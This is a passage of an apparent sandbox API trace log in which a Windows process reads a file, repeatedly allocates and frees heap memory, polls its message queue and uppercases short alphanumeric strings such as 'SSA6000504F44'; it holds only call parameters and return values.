lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0199.798] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0xda8a, lpOverlapped=0x0) returned 1 [0199.800] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0199.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xda8a) returned 0x24c7a50 [0199.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0199.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xda8a) returned 0x24d54e8 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xda8a) returned 0x24c7a50 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0199.803] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.803] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xda8a) returned 0x24c7a50 [0199.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xda8a) returned 0x24e2f80 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.807] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.811] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.811] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.825] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.825] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.825] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.826] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.826] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 